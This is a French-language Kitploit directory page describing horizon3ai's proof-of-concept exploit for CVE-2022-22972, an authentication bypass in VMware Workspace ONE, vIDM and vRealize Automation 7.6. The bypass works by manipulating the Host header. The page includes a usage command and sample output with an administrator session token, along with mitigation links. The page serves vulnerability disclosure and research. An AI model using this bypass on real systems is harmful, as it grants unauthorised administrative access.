Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-22972 — Exploit de preuve de concept pour CVE-2022-22972 qui contourne l'authentification dans VMware Workspace ONE, vIDM et vRealize Automation 7.6 via la manipulation de l'en-tête Host. | Kitploit
Outils/GitHubGitHub/horizon3ai/cve-2022-22972
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed Teaming
GitHubhorizon3ai/cve-2022-22972

CVE-2022-22972

Exploit de preuve de concept pour CVE-2022-22972 qui contourne l'authentification dans VMware Workspace ONE, vIDM et vRealize Automation 7.6 via la manipulation de l'en-tête Host.

Voir le dépôt
15027il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-22972

POC pour CVE-2022-22972 affectant VMware Workspace ONE, vIDM et vRealize Automation 7.6.

Analyse technique

Une analyse technique des causes profondes de la vulnérabilité se trouve sur notre blog : https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive

Résumé

Ce script peut être utilisé pour contourner l'authentification sur vRealize Automation 7.6 en utilisant CVE-2022-22972. Workspace ONE et vIDM ont des points de terminaison d'authentification différents, mais le cœur de la vulnérabilité reste le même. Nous serions ravis d'accepter des pull requests si vous avez des articles de test pour vérifier le flux.

Ce script fonctionne en modifiant l'en-tête Host d'une requête HTTP POST d'un point de terminaison d'authentification VMware vers un Host contrôlé par un attaquant. Cela amène l'application VMware à contacter le Host avec des informations d'identification et si le Host renvoie 200, l'utilisateur est authentifié avec succès.

Ce script génère un cookie HZN qui peut être inclus dans des requêtes ultérieures pour effectuer des actions en tant qu'utilisateur compromis.

REMARQUE : Les arguments par défaut du script enverront la demande d'authentification à notre passerelle API AWS qui est configurée pour répondre avec un 200 pour le point de terminaison spécifique mentionné dans le blog. Vous pouvez changer cela avec l'option --host. Ce point de terminaison ne recevra aucune donnée sensible lors du flux d'exploitation - seulement une requête de l'application vulnérable avec l'en-tête d'authentification factice à laquelle il répond.

Utilisation

root@kitploit:~
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint

HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8

Set the HZN cookie in your browser to bypass authentication

Atténuations

Mettez à jour vers la dernière version ou atténuez en suivant les instructions dans le VMSA

  • https://www.vmware.com/security/advisories/VMSA-2022-0014.html

Suivez l'équipe d'attaque Horizon3.ai sur Twitter pour les dernières recherches en sécurité :

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Avertissement

Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.

Télécharger l’outil